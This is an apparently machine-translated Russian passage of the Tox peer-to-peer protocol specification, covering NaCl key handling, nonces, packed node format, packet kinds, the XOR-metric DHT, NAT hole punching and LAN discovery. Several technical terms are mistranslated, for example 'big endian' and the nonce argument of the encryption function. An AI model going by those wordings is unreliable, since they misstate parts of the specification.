Word8| uint8_t| u8| 1| 255 (0xff)
Word16| uint16_t| u16| 2| 65535 (0xffff)
Word32| uint32_t| u32| 4| 4294967295 (0xffffffff)
Word64| uint64_t| u64| 8| 18446744073709551615 (0xffffffffffffffff)

1.3 Строки

Строка - это структура данных, используемая для человекочитаемого текста. Строки представляют собой последовательности глифов. Глиф состоит из одной точки кода Юникода не нулевой ширины и нуля или более точек кода Юникода нулевой ширины. Человекочитаемое представление строки начинается и заканчивается кавычками (") и содержит все человекочитаемые глифы полностью. Управляющие символы представлены изоморфно человекочитаемому представлению. То есть каждый управляющий символ имеет ровно одно человекочитаемое представление, и существует отображение от человекочитаемого представления к управляющему символу. Поэтому использование управляющих символов Юникода (U+240x) не допускается без дополнительного маркера.

2 Crypto

Модуль Crypto содержит все функции и типы данных, связанные с криптографией. Сюда входят генерация случайных чисел, шифрование и дешифрование, генерация ключей, операции с одноразовыми номерами и генерация случайных одноразовыхномеров.

2.1 Ключ

Крипточисло - это большое целое число фиксированного размера без знака (положительное). Его двоичное кодирование - это целое число с большим конечным числом в точном соответствии с размером закодированного байта. Человекочитаемое кодирование - это число base-16, закодированное как String. Реализация NaCl libsodium предоставляет функции sodium_bin2hex и sodium_hex2bin для помощи в реализации человекочитаемой кодировки. Кодирование в памяти этих крипточисел в NaCl уже удовлетворяет двоичной кодировке, поэтому для приложений, непосредственно использующих эти API, двоичное кодирование и декодирование является идентификационной функцией.

Tox использует четыре вида крипточисел:

Type| Bits| Encoded byte size
---|---|---
Public Key| 256| 32
Secret Key| 256| 32
Combined Key| 256| 32
Nonce| 192| 24

2.1.1 Пара ключей

Пара ключей - это пара секретного и открытого ключей. Новая пара ключей генерируется с помощью функции crypto_box_keypair криптобиблиотеки NaCl. Два отдельных вызова функции генерации пары ключей должны возвращать разные пары ключей. Подробности см. в документации NaCl.
Открытый ключ может быть вычислен из секретного ключа с помощью функции NaCl crypto_scalarmult_base, которая вычисляет скалярное произведение элемента стандартной группы и секретного ключа. Подробности см. в документации NaCl.

2.1.2 Комбинированный ключ

Комбинированный ключ вычисляется из секретного и открытого ключей с помощью функции NaCl crypto_box_beforenm. Если даны две пары ключей KP1 (SK1, PK1) и KP2 (SK2, PK2), то комбинированный ключ, вычисленный из (SK1, PK2), равен ключу, вычисленному из (SK2, PK1). Это позволяет осуществлять симметричное шифрование, поскольку одноранговые сети могут получить один и тот же общий ключ из своего секретного ключа и открытого ключа однорангового сети.
В протоколе Tox пакеты шифруются с помощью открытого ключа получателя и секретного ключа отправителя. Получатель расшифровывает пакеты, используя секретный ключ получателя и открытый ключ отправителя.
Тот факт, что для шифрования и расшифровки пакетов с обеих сторон используется один и тот же ключ, означает, что отправляемые пакеты могут быть повторно переданы обратно отправителю, если этому ничто не препятствует.
Генерация общего ключа является наиболее ресурсоемкой частью шифрования/дешифрования, что означает, что использование ресурсов может быть значительно сокращено путем сохранения общих ключей и их повторного использования в дальнейшем, насколько это возможно.

2.1.3 Nonce

Случайный nonce генерируется с помощью криптографически безопасного генератора случайных чисел из библиотеки NaCl randombytes.
Значение nonce увеличивается путем интерпретации его как числа Big Endian и добавления 1. Если nonce имеет максимальное значение, то значение после инкремента равно 0.
В большинстве частей протокола используются случайные несы. Это предотвращает ассоциацию новых несов с предыдущими. Если бы множество различных пакетов можно было связать вместе из-за способа генерации несов, это могло бы привести, например, к связыванию пакетов DHT и onion announce вместе. Это внесло бы изъян в систему, поскольку недруги могли бы связать вместе ключи DHT и долгосрочные ключи некоторых людей.

2.2 Box

Протокол Tox различает два типа текста: Обычный текст и Шифрованный текст. Шифрованный текст может передаваться по ненадежным каналам передачи данных. Обычный текст может быть чувствительным или нечувствительным. Чувствительный открытый текст должен быть преобразован в шифрованный текст с помощью функции шифрования, прежде чем его можно будет передавать по ненадежным каналам передачи данных.
Функция шифрования принимает комбинированный ключ, кодовый ключ, открытый текст и возвращает зашифрованный текст. Для выполнения шифрования она использует crypto_box_afternm. Смысл предложения "шифрование с помощью секретного ключа, открытого ключа и nonce" заключается в следующем: вычислить комбинированный ключ из секретного ключа и открытого ключа, а затем использовать функцию шифрования для преобразования.
Функция расшифровки принимает комбинированный ключ, nonce и зашифрованный текст и возвращает либо открытый текст, либо ошибку. Она использует crypto_box_open_afternm из библиотеки NaCl. Поскольку шифр симметричный, функция шифрования может также выполнять дешифрование, но не будет выполнять аутентификацию сообщения, поэтому реализация должна быть осторожной, чтобы использовать правильные функции.

crypto_box использует симметричное шифрование xsalsa20 и аутентификацию poly1305.

Функции create и handle request являются функциями шифрования и расшифровки для типа пакетов DHT, используемых для отправки данных непосредственно другим узлам DHT. Честно говоря, они должны быть в модуле DHT, но, похоже, они лучше подходят здесь. TODO: Что именно представляют собой эти функции?

3 Информация об узлах

3.1 Транспортный протокол

Транспортный протокол - это протокол транспортного уровня, расположенный непосредственно под самим протоколом Tox. Tox поддерживает два транспортных протокола: UDP и TCP. Двоичное представление транспортного протокола - это один бит: 0 для UDP, 1 для TCP. Если бит закодирован как отдельное значение, он хранится в наименьшем значащем бите байта. Если за ним следуют другие данные, упакованные в биты, он занимает ровно один бит.

Человекочитаемое представление для UDP - UDP, а для TCP - TCP.

3.2 Адрес хоста

Адрес хоста - это либо IPv4, либо IPv6 адрес. Двоичное представление адреса IPv4 - это Big Endian 32-битное беззнаковое целое число (4 байта). Для адреса IPv6 это Big Endian 128-битное беззнаковое целое число (16 байт). Двоичное представление адреса хоста - это 7-битное беззнаковое целое число, определяющее семейство адресов (2 для IPv4, 10 для IPv6), за которым следует сам адрес.

Таким образом, при упаковке вместе с транспортным протоколом первый бит упакованного байта - это протокол, а следующие 7 бит - семейство адресов.

3.3 Номер порта

Номер порта - это 16-битное число. Его двоичное представление - большое конечное 16-битное беззнаковое целое число (2 байта).

Length| Type| Contents
---|---|---
1 bit| Transport Protocol| UDP = 0, TCP = 1
7 bit| Address Family| 2 = IPv4, 10 = IPv6
4 | 16| IP address| 4 bytes for IPv4, 16 bytes for IPv6
2| Port Number| Port number
32| Public Key| Node ID

Формат упакованных узлов - это способ хранения информации об узлах в небольшом, но удобном для разбора формате. Чтобы сохранить более одного узла, просто добавьте еще один узел к предыдущему: [packed node 1][packed node 2][...].
В формате упакованного узла первый байт (старший бит протокола, младшие 7 бит семейства адресов) называется IP-типом. Следующая таблица носит информативный характер и может быть использована для упрощения реализации.

IP Type| Transport Protocol| Address Family
---|---|---
2 (0x02)| UDP| IPv4
10 (0x0a)| UDP| IPv6
130 (0x82)| TCP| IPv4
138 (0x8a)| TCP| IPv6

Число 130 используется для IPv4 TCP реле, а 138 используется для обозначения IPv6 TCP реле.
Причина этих чисел в том, что в Linux номера для IPv4 и IPv6 (определяемые AF_INET и AF_INET6) равны 2 и 10. Номера TCP - это просто номера UDP + 128.

4 Пакет протокола

Пакет протокола - это элемент протокола Tox верхнего уровня. Все другие типы пакетов обернуты в пакеты протокола. Он состоит из типа пакета и полезной нагрузки. Двоичное представление типа пакета - это один байт (8 бит). Полезная нагрузка представляет собой произвольную последовательность байтов.

Length| Type| Contents
---|---|---
1| Packet Kind| The packet kind identifier
[0,]| Bytes| Payload

Эти пакеты верхнего уровня могут передаваться различными способами, наиболее распространенным из которых является передача по сети с помощью UDP или TCP. Сам протокол не предписывает транспортных методов, и реализация может свободно реализовать дополнительные транспортные средства, такие как WebRTC, IRC или pipes.
В остальной части документа различные виды протокольных пакетов указываются с указанием типа пакета и полезной нагрузки. Вид пакета не повторяется в описании полезной нагрузки (TODO: на самом деле в основном повторяется, но позже не будет повторяться).
Внутри полезной нагрузки протокольных пакетов другие типы пакетов могут указывать дополнительные виды пакетов. Например, внутри пакета Crypto Data (0x1b) модуль Messenger определяет свои протоколы для обмена сообщениями, передачи файлов и т.д. Протокольные пакеты верхнего уровня сами по себе не шифруются, хотя их полезная нагрузка может быть зашифрована.

4.1 Виды пакетов

Ниже приведен исчерпывающий список названий видов пакетов верхнего уровня и их количество. Их полезная нагрузка указана в специальных разделах. Каждый раздел называется по имени вида пакета, который он описывает, после чего в круглых скобках указывается значение байта, например, Ping Request (0x00).

Byte value| Packet Kind
---|---
0x00| Ping Request
0x01| Ping Response
0x02| Nodes Request
0x04| Nodes Response
0x18| Cookie Request
0x19| Cookie Response
0x1a| Crypto Handshake
0x1b| Crypto Data
0x20| DHT Request
0x21| LAN Discovery
0x80| Onion Request 0
0x81| Onion Request 1
0x82| Onion Request 2
0x83| Announce Request
0x84| Announce Response
0x85| Onion Data Request
0x86| Onion Data Response
0x8c| Onion Response 3
0x8d| Onion Response 2
0x8e| Onion Response 1
0xf0| Bootstrap Info

5 DHT

DHT - это самоорганизующийся комплекс всех узлов сети Tox. Узел в сети Tox также называется "узел Tox". Когда мы говорим о " peers", мы имеем в виду любой узел, который не является локальным узлом (субъектом). Этот модуль заботится о поиске IP и порта узлов и установлении маршрута к ним напрямую через UDP, используя при необходимости пробивку дыр. DHT работает только на UDP и поэтому используется только в том случае, если UDP работает.
Каждый узел в Tox DHT имеет эфемерную пару ключей, называемую парой ключей DHT, состоящую из секретного ключа DHT и открытого ключа DHT. Открытый ключ DHT служит в качестве адреса узла. Пара ключей DHT обновляется каждый раз при закрытии или перезапуске экземпляра tox. Реализация может обновлять ключ чаще, но это приведет к отключению всех пиров.
Открытый ключ DHT друга можно найти с помощью модуля onion. Когда открытый ключ DHT друга известен, DHT используется для его поиска и прямого соединения с ним по UDP.

5.1 Дистанции (Distance)

The Distance - это целое положительное число. Его человекочитаемое представление - это число base-16. Distance (тип) - это упорядоченный моноид с ассоциативным бинарным оператором + и элементом тождества 0.
DHT использует метрику для определения расстояния между двумя узлами. Тип Distance является со-доменом этой метрики. В настоящее время метрика, используемая Tox DHT, представляет собой XOR открытых ключей узлов: distance(x, y) = x XOR y. Для этих вычислений открытые ключи интерпретируются как большие целые числа (см. Крипто-числа).
Когда мы говорим о "близком узле", мы имеем в виду, что его расстояние до рассматриваемого узла мало по сравнению с расстоянием до других узлов.
Реализация не обязана предоставлять тип Distance, поэтому он не имеет определенного двоичного представления. Например, вместо того, чтобы вычислять Distance и сравнивать его с другим Distance, реализация может выбрать реализацию Distance в виде пары открытых ключей и определить упорядочение по Distance без вычисления полного интегрального значения. Это работает, потому что как только решение об упорядочении может быть принято в самых значимых битах, последующие биты не будут влиять на это решение.

XOR является корректной метрикой, т.е. удовлетворяет необходимым условиям:

Неотрицательность distance(x, y) >= 0: Поскольку открытые ключи являются крипточислами, которые по определению положительны, их XOR обязательно положителен.

Идентичность неотрицательных чисел distance(x, y) == 0 iff x == y: XOR двух целых чисел равен нулю, если они равны.

Симметрия distance(x, y) == distance(y, x): XOR - симметричная операция.

Субаддитивность distance(x, z) <= distance(x, y) + distance(y, z): следует из ассоциативности, так как x XOR z = x XOR (y XOR y) XOR z = distance(x, y) XOR distance(y, z), что не больше distance(x, y) + distance(y, z).

Кроме того, XOR обладает другими полезными свойствами:

Однонаправленность: для ключа x и расстояния d существует один и только один ключ y такой, что distance(x, y) = d.
Из этого следует, что повторные поиски, скорее всего, будут проходить по одному и тому же пути, поэтому кэширование имеет смысл.

Источник: [maymounkov- kademlia](http://pdos.csail.mit.edu/%7Epetar/papers/maymounkov-kademlia- lncs.pdf)

Пример: Даны три узла с ключами 2, 5 и 6:

2 XOR 5 = 7
2 XOR 6 = 4
5 XOR 2 = 7
5 XOR 6 = 3
6 XOR 2 = 4
6 XOR 5 = 3

Ближайшим узлом от 2 и 5 является 6. Ближайшим узлом от 6 является 5 с удалением 3. Этот пример показывает, что ключ, близкий с точки зрения целочисленного сложения, не обязательно будет близким с точки зрения XOR.

5.2 K-buckets

K-buckets - это структура данных для эффективного хранения набора узлов, близких к определенному ключу, называемому базовым ключом. Базовый ключ является постоянным на протяжении всего времени существования экземпляра k-buckets.
k-buckets - это карта из небольших целых чисел 0 <= n < 256 в набор до k инфо узлов. Набор называется bucket. k называется размером bucket. По умолчанию размер bucket равен 8.
Указанное выше число n - это индекс bucket. Это положительное целое число с диапазоном [0, 255], т.е. диапазон 8-битного беззнакового целого числа.
Элемент bucket - это элемент представляет собой упорядоченное множество, и записи сортируются по расстоянию от базового ключа. Таким образом, первый (наименьший) элемент набора является самым близким к базовому ключу в этом наборе, последний (наибольший) элемент - самый удаленный.

5.2.1 Bucket Index

Индекс bucket можно вычислить с помощью следующей функции: bucketIndex(baseKey, nodeKey) = 255 - log_2(distance(baseKey, nodeKey)). Эта функция не определена, когда baseKey == nodeKey, что означает, что k-bucket никогда не будет содержать Node Info о базовом узле.
Таким образом, каждый k-bucket содержит только Node Infos, для ключей которых выполняется следующее: если узел с ключом nodeKey находится в k-bucket с индексом n, то bucketIndex(baseKey, nodeKey) == n. Таким образом, n'th k-bucket состоит из узлов, для которых расстояние до базового узла лежит в диапазоне [2^n, 2^(n+1) - 1].
Индекс bucket можно эффективно вычислить, определив первый бит, в котором отличаются два ключа, начиная со старшего бита. Так, если локальный ключ DHT начинается, например, с 0x80, а ключ узла с bucket начинается с 0x40, то индекс bucket для этого узла равен 0. Если второй бит отличается, то индекс bucket равен 1. Если ключи почти одинаковы и отличается только последний бит, то индекс bucket равен 255.

5.2.2 Обновление k-buckets

TODO: это отличается от политики kademlia по наименьшему времени выселения; почему было выбрано существующее решение, как оно влияет на безопасность, производительность и устойчивость к отравлениям? В оригинальной статье утверждается, что предпочтение старых живых узлов приводит к лучшей стойкости и устойчивости к базовым DDoS-атакам;
Любая операция обновления или поиска на экземпляре k-buckets, в которой участвует один узел, требует, чтобы мы сначала вычислили индекс bucket для этого узла. Обновление с участием Node Info с nodeKey == baseKey не имеет никакого эффекта. Если обновление приводит к появлению пустого элемента, этот элемент удаляется из карты. Блок заполнен, если в нем содержится максимальное количество записей, заданное размером блока.
Узел является жизнеспособным для записи, если bucket не заполнен или открытый ключ узла имеет меньшее расстояние от базового ключа, чем текущая запись с наибольшим расстоянием. Если узел жизнеспособен, а bucket заполнено, запись с наибольшим расстоянием от базового ключа удаляется, чтобы размер bucket не превышал максимальный настроенный размер bucket
Добавление узла, ключ которого уже существует, приводит к обновлению информации об узле в bucket. Удаление узла, для которого не существует информации об узле в k-bucket не имеет никакого эффекта. Таким образом, удаление узла дважды разрешено и имеет тот же эффект, что и однократное удаление.

5.3 Состояние узла DHT

Каждый узел DHT содержит пару ключей, называемую парой ключей DHT.
Узел DHT также хранит набор Node Infos узлов, которые близки к его собственному открытому ключу DHT. Для этого используется структура данных k-buckets, а в качестве базового ключа используется локальный открытый ключ DHT.

5.4 Самоорганизация

Самоорганизация в DHT происходит путем подключения каждого пира DHT к произвольному числу пиров, ближайших к его собственному открытому ключу DHT, и некоторых, находящихся дальше.
Если каждый пир в сети знает пиров с открытым ключом DHT, ближайшим к его открытому ключу DHT, то для поиска конкретного пира с открытым ключом X пиру достаточно рекурсивно запросить пиров в DHT об известных пирах, имеющих открытые ключи DHT, ближайшие к X. В конечном итоге пир найдет пиров в DHT, которые ближе всего к этому пиру, и, если этот пир находится в сети, он найдет их.

5.5 Пакет DHT

Пакет DHT содержит открытый ключ DHT отправителя, шифрующий код Nonce и зашифрованную полезную нагрузку. Полезная нагрузка шифруется с помощью секретного ключа DHT отправителя, открытого ключа DHT получателя и nonce, который отправляется вместе с пакетом. Пакеты DHT отправляются внутри пакетов протокола с изменяющимся типом пакета.

Length| Type| Contents
---|---|---
32| Public Key| Sender DHT Public Key
24| Nonce| Random nonce
[16,]| Bytes| Encrypted payload

Длина зашифрованной полезной нагрузки составляет не менее 16 байт, поскольку шифрование включает MAC из 16 байт. Таким образом, 16-байтовая полезная нагрузка была бы пустым сообщением. Протокол DHT никогда не отправляет пустые сообщения, поэтому в действительности минимальный размер Ping-пакета составляет 27 байт.

5.6 Службы RPC

Служба RPC DHT состоит из пакета запроса и пакета ответа. Пакет DHT RPC содержит полезную нагрузку и идентификатор запроса. Этот идентификатор представляет собой 64-битное беззнаковое целое число, которое помогает идентифицировать ответ для данного запроса. Идентификатор запроса в ответном пакете должен быть равен идентификатору запроса в запросе, на который он отвечает.

Пакеты DHT RPC шифруются и передаются внутри пакетов DHT.

Length| Type| Contents
---|---|---
[0,]| Bytes| Payload
8| uint64_t| Request ID

Минимальный размер полезной нагрузки равен 0, но в действительности наименьший разумный размер полезной нагрузки равен 1. Поскольку в обоих направлениях связи используется один и тот же симметричный ключ, зашифрованный Запрос будет действительным зашифрованным Ответом, если они содержат один и тот же открытый текст.
Части протокола, использующие пакеты RPC, должны позаботиться о том, чтобы полезная нагрузка запроса не была действительной полезной нагрузкой ответа. Например, пакеты Ping несут булевый флаг, который указывает, соответствует ли полезная нагрузка Запросу или Ответу.
Идентификатор запроса обеспечивает некоторую устойчивость к атакам повторного воспроизведения. Если бы не было идентификатора запроса, злоумышленнику было бы легко воспроизвести старые ответы и таким образом предоставить узлам устаревшую информацию. Точное значение Request ID будет указано позже в разделе DHT.

5.6.1 Служба Ping

Служба Ping используется для периодической проверки того, жив ли еще другой узел.
Полезная нагрузка Ping-пакета состоит только из булева значения, говорящего о том, является ли это запросом или ответом.
Однобайтовое булево значение внутри зашифрованной полезной нагрузки добавляется для того, чтобы предотвратить создание пирами действительного Ping-ответа из Ping-запроса без расшифровки пакета и шифрования нового. Поскольку используется симметричное шифрование, зашифрованный Ping Response будет по байтам равен Ping Request без байта отличия.

Length| Type| Contents
---|---|---
1| Bool| Response flag: 0x00 for Request, 0x01 for Response

5.6.1.1 Запрос Ping (0x00)

Запрос Ping - это пакет Ping с флагом ответа, установленным на False. Когда запрос Ping Request получен и успешно расшифрован, создается пакет Ping Response и отправляется обратно запрашивающему.

5.6.1.2 Ping Response (0x01)

Ping Response - это Ping-пакет с флагом ответа, установленным на True.

5.6.2 Служба узлов

Служба Nodes Service используется для запроса у другого узла DHT до 4 известных им узлов, которые находятся ближе всего к запрашиваемому узлу.

RPC-служба DHT Nodes использует формат упакованных узлов.

5.6.2.1 Запрос узлов (0x02)

Length| Type| Contents
---|---|---
32| Public Key| Requested DHT Public Key

Открытый ключ DHT, отправленный в запросе, ищет отправитель.

[5.6.2.2 Ответ узлов (0x04) ](https://zetok.github.io/tox-spec/#nodes-

response-0x04)

Length| Type| Contents
---|---|---
1| Int| Number of nodes in the response (maximum 4)
[39, 204]| Node Infos| Nodes in Packed Node Format

Узел IPv4 имеет размер 39 байт, узел IPv6 - 51 байт, поэтому максимальный размер составляет 51 * 4 = 204 байта.
Ответы узлов должны содержать 4 ближайших узла, которые отправитель ответа имеет в своем списке известных узлов.

5.7 Принципы работы DHT

Только протокол UDP (IP Type 2 и 10) используется в модуле DHT при отправке узлов с упакованным форматом узлов. Это связано с тем, что протокол TCP используется для отправки ретрансляционной информации TCP, а DHT - только UDP.
Это сделано для увеличения скорости поиска пиров. Toxcore также хранит 8 узлов (они должны быть такими же или меньше, чем узлы, которые Toxcore хранит для каждого индекса в своем списке close list, чтобы убедиться, что все найденные ближайшие пиры будут знать искомый узел), ближайших к каждому из открытых ключей в своем списке друзей DHT (или списке открытых ключей DHT, которые он активно пытается найти и подключиться к ним). Toxcore пингует каждый узел в списках каждые 60 секунд, чтобы проверить, жив ли он. Он не хранит себя ни в одном из списков и не посылает никаких запросов самому себе. Узлы могут находиться более чем в одном списке, например, если открытый ключ DHT пира очень близок к открытому ключу DHT друга, которого ищут. Он также посылает запросы get node на случайный узел (случайность делает его непредсказуемым, предсказуемость или знание того, какой узел будет пинговаться следующим, может облегчить некоторые атаки, нарушающие работу сети, поскольку добавляет возможный вектор атаки) в каждом из этих списков узлов каждые 20 секунд, при этом публичным ключом поиска является его публичный ключ для ближайшего узла, а публичными ключами поиска - те, которые находятся в списке друзей DHT. Узлы удаляются после 122 секунд отсутствия ответа. Узлы добавляются в списки после получения от них правильного ответа ping или пакета send node. Если узел уже присутствует в списке, он обновляется, если изменился его IP-адрес. Узел может быть добавлен в список, только если список не полон или если открытый ключ DHT узла ближе, чем открытый ключ DHT хотя бы одного из узлов в списке к открытому ключу, поиск которого ведется в этом списке. Когда узел добавляется в полный список, он заменяет самый дальний узел.
Если увеличить число узлов до 32, это увеличит количество пакетов, необходимых для проверки того, жив ли каждый из них, что увеличит использование полосы пропускания, но повысит надежность. Если бы количество узлов было уменьшено, надежность снизилась бы вместе с использованием полосы пропускания. Причина такой зависимости между надежностью и количеством узлов заключается в том, что если мы предположим, что не все узлы имеют открытые UDP порты или находятся за NAT, это означает, что каждый из этих узлов должен иметь возможность хранить определенное количество узлов за NAT, чтобы другие могли найти эти узлы за NAT. Например, если 7/8 узлов находятся за NAT, использование 8 узлов будет недостаточно, потому что вероятность того, что некоторые из этих узлов невозможно будет найти в сети, будет слишком высока. Если бы таймауты пингов и задержки между пингами были выше, это уменьшило бы использование полосы пропускания, но увеличило бы количество отключенных узлов, которые все еще хранятся в списках. Уменьшение этих задержек привело бы к обратному результату.
Если увеличить число узлов ближайших к каждому открытому ключу от 8, до 16, это увеличит использование полосы пропускания, может повысить эффективность атак на симметричных NAT и надежность. Уменьшение этого числа будет иметь противоположный эффект.
При получении пакета send node, toxcore проверяет, может ли каждый из полученных узлов быть добавлен в любой из списков. Если узел может быть добавлен, toxcore посылает ему ping-пакет, если не может - игнорирует. При получении пакета get node, toxcore найдет 4 узла в своих списках узлов, наиболее близких к открытому ключу в пакете, и отправит их в ответе send node. Таймауты и количество узлов в списках для toxcore были выбраны исключительно по ощущениям и, вероятно, не являются лучшими значениями. Это также относится к поведению, которое является простым и должно быть улучшено, чтобы сделать сеть более устойчивой к атакам sybil.

5.8 Пакеты запроса DHT

Length| Contents
---|---
1| uint8_t (0x20)
32| receiver's DHT public key
32| sender's DHT public key
24| nonce
?| encrypted message

Пакеты запросов DHT - это пакеты, которые могут быть отправлены через один узел DHT другому узлу, который он знает. Они используются для отправки зашифрованных данных друзьям, с которыми мы не обязательно связаны напрямую в DHT.
Узел DHT, получивший пакет запроса DHT, проверяет, является ли открытый ключ получателя его открытым ключом DHT, и если да, то расшифровывает и обрабатывает пакет. Если нет, они проверят, знают ли они этот открытый ключ DHT (если он есть в их списке близких узлов). Если нет, они отбрасывают пакет. Если да, то они повторно отправят точно такой же пакет этому узлу DHT.
Зашифрованное сообщение шифруется с помощью открытого ключа DHT получателя, закрытого ключа DHT отправителя и nonce (случайно сгенерированные 24 байта).
Пакеты запросов DHT используются для пакетов DHTPK (см. лук) и пакетов NAT ping.

5.8.1 Пакеты NAT ping

Инкапсулируются в пакет запроса DHT.
Пакеты NAT ping используются для проверки, находится ли друг, с которым мы не связаны напрямую, в сети и готов ли он

5.8.1.1 Запрос NAT ping

Length| Contents
---|---
1| uint8_t (0xfe)
1| uint8_t (0x00)
8| uint64_t random number

Полученный NAT ping запрос необходимо проверить, не от друга ли он.
Проверка осуществляется путем сравнения открытого ключа из пакета запроса DHT, в который был инкапсулирован данный NAT ping запрос, со списком открытых ключей собственных друзей.
Если NAT ping запрос...
... от своего друга, ответ NAT ping с тем же случайным числом, что и запрос, должен быть послан обратно через узлы, которые знают друга, пославшего запрос.
Если нет узлов, которые знают друга, пакет будет отброшен.
... не от собственного друга, пакет будет сброшен.

5.8.1.2 Ответ NAT ping

Length| Contents
---|---
1| uint8_t (0xfe)
1| uint8_t (0x01)
8| uint64_t random number (the same that was received in request)

5.9 Сквозное сеодинение

Механизм для определения необходимости запуска сквозного сеодинения:

Запрос от 8 ближайших к собственному узлу пиров IP:порт друга.
По крайней мере 4+ узлов возвращают IP:порт друга.
Отправьте запрос DHT ping на каждый из этих IP:портов.
Если ответ не получен, начните Сквозное сеодинение

Числа 8 и 4 используются в toxcore и были выбраны только на основе "ощущения" и могут быть не оптимальными.

Перед началом сквозное сеодинение другу посылается пакет NAT ping через пиров, которые утверждают, что знают друга. Если получен ответ NAT ping с тем же случайным числом, то сквозное сеодинение должно быть начато.
Получение ответа NAT ping означает, что друг находится в сети и активно ищет нас, поскольку это единственный способ узнать узлы, которые знают нас. сквозное сеодинение будет работать только в том случае, если друг активно пытается подключиться к нам.
Запросы NAT ping отправляются каждые 3 секунды в toxcore. Если в течение 6 секунд не получен ответ, сквозное сеодинение прекращается.
Отправка запросов NAT ping через более длительные интервалы может увеличить вероятность того, что другой узел выйдет из сети и пакеты ping, посылаемые в процессе создания сквозного сеодинения будут отправлены "мертвому" аналогу, но потенциально это может снизить использование полосы пропускания. Уменьшение интервалов будет иметь противоположный эффект.
Для "сквозное сеодинения" мы предполагаем, что люди, использующие Tox, используют один из трех типов NAT:

Cone NAT

Restricted Cone NAT

Symmetric NAT

Есть 3 случая, с которыми может столкнуться toxcore при сквозном соединении:

4+ близких к заданному публичному ключу пиров вернули один и тот же IP:порт
4+ близких к данному открытому ключу пиров вернули один и тот же IP, но разный порт
близкие к данному PK пиры вернули разные IP:порты

5.9.1 Cone NAT

Поведение программного обеспечения, выполняющего NAT:

Назначить один целый порт каждому UDP сокету за NAT, любой пакет с любого IP:порта, посланный на этот назначенный порт из Интернета, будет перенаправлен на сокет за ним.
Сквозное соединение с помощью обычных cone NAT достигается просто за счет способа функционирования DHT, т.е. мы посылаем на IP:порт друга DHT запрос ping, и получаем ответ DHT ping.

5.9.2 Restricted Cone NAT

Поведение программного обеспечения, выполняющего NAT:
Назначить один целый порт каждому UDP сокету за NAT. Перенаправлять пакеты только с IP, на которые сокет UDP отправил пакет.
Если 4+ узлов рядом с нами возвращают один и тот же IP:порт друга, это означает, что друг находится на Restricted Cone NAT.
Сквозное соединение можно осуществить, заставив друга отправить пакет на наш публичный IP:порт. Это означает, что сквозное соединение может быть достигнуто легко и что мы должны просто продолжать регулярно посылать пакеты DHT ping на этот IP:порт, пока не получим ответ DHT ping. Это сработает, потому что друг ищет нас в DHT. Найдя нас, друг отправит пакет на наш публичный IP:порт , тем самым установив соединение.

5.9.3 Симметричный NAT

Худший вариант.

Поведение программного обеспечения, выполняющего NAT:

Присваивать новый порт для каждого IP:порта, на который отправляется пакет. Рассматривать каждый новый пир, на который отправляется UDP-пакет, как соединение. Пересылать в сокет пакеты только с назначенного IP:порта этого соединения.

В случае плохой реализации, crash & burn, заставляя пользователей плакать.

Близкие узлы не возвращают один и тот же порт для друга - это означает, что друг находится на симметричном NAT.

Некоторые симметричные NAT открывают порты последовательно, что может привести к тому, что порты, возвращаемые близкими нам узлами, будут, например, 1345, 1347, 1389, 1395.
Сквеозное соединение с помощью симметричных NAT основано на угадывании того, какие порты с большей вероятностью будут использоваться другом, когда он пытается отправить нам ping-запрос. Запросы DHT ping посылаются на эти порты до тех пор, пока не будет получен ответ DHT ping.
Toxcore пробует все порты, рядом с каждым возвращенным портом (например, для 4 портов, перечисленных ранее, он будет пробовать: 1345, 1347, 1389, 1395, 1346, 1348, 1390, 1396, 1344, 1346...), постепенно пробуя порты все дальше от тех, о работе которых сообщили близкие узлы.

Пробуйте до 48 портов каждые 3 секунды, пока соединение не будет установлено.

После 5 попыток удвойте (?)диапазон(?) и начните пробовать порты от 1024, 48 одновременно, включая ранее угаданные порты.
Это, похоже, исправляет ситуацию для некоторых симметричных NAT, скорее всего, потому что многие из них перезапускают счетчик на 1024. - irungentoo
Увеличение количества портов, проверяемых в секунду, ускорит процесс скврзного соединения, но также может привести к DoS NAT из-за большого количества пакетов, отправляемых на разные IP за короткий промежуток времени. Уменьшение количества портов замедляет процесс сквозного соединения

Хотя это работает, но метод может быть улучшен.

5.9.4 Разные IP:порты

Может возникнуть, когда пиры возвращают разные IP и порты.

Есть 2 случая, когда это может произойти:

друг находится за очень строгим NAT, который не может быть пробит.
друг недавно подключился к другому интернет соединению и некоторые пиры все еще имеют устаревшую информацию.

Ничего нельзя сделать, если NAT очень строгий, поэтому рекомендуется использовать наиболее распространенный IP, возвращаемый пирами, и игнорировать другие IP:порты.

5.10 Информация о Bootstrap узлах DHT (0xf0)

Узлы Bootstrap - это обычные узлы Tox со стабильным открытым ключом DHT. Это означает, что открытый ключ DHT не меняется при перезагрузках. Узлы бутстрапа DHT имеют один дополнительный тип запроса: Bootstrap Info. Запрос представляет собой пакет длиной 78 байт, где первый байт - 0xf0. Остальные байты игнорируются.

Формат ответа следующий:

Length| Type| Contents
---|---|---
4| Word32| Bootstrap node version
256| Bytes| Message of the day

6 Обнаружение локальной сети

Обнаружение локальной сети - это способ обнаружения пиров Tox, находящихся в локальной сети. Если два друга Tox находятся в локальной сети, то наиболее эффективным способом их совместного общения будет использование локальной сети. Если клиент Tox открыт в локальной сети, в которой существует другой клиент Tox, то хорошим поведением будет загрузиться в сеть, используя клиент Tox в локальной сети. Именно этого и добивается обнаружение локальной сети.
Обнаружение локальной сети происходит путем отправки UDP пакета через UDP сокет toxcore на широковещательный адрес интерфейса в IPv4, глобальный широковещательный адрес (255.255.255.255) и многоадресный адрес в IPv6 (FF02::1) на UDP порт Tox по умолчанию (33445).

Пакет LAN Discovery:

Length| Contents
---|---
1| uint8_t (33)
32| DHT public key

Пакеты LAN Discovery содержат открытый ключ DHT отправителя. При получении пакета LAN Discovery отправителю пакета будет отправлен пакет DHT get nodes. Это означает, что экземпляр DHT будет загружать себя к каждому пиру, от которого он получает один из этих пакетов. Благодаря этому механизму клиенты Tox будут автоматически загружаться от других клиентов Tox, работающих в локальной сети.
Когда этот механизм включен, toxcore отправляет эти пакеты каждые 10 секунд, чтобы снизить задержки. Пакеты можно посылать и каждые 60 секунд, но это сделает поиск пиров по сети в 6 раз медленнее.
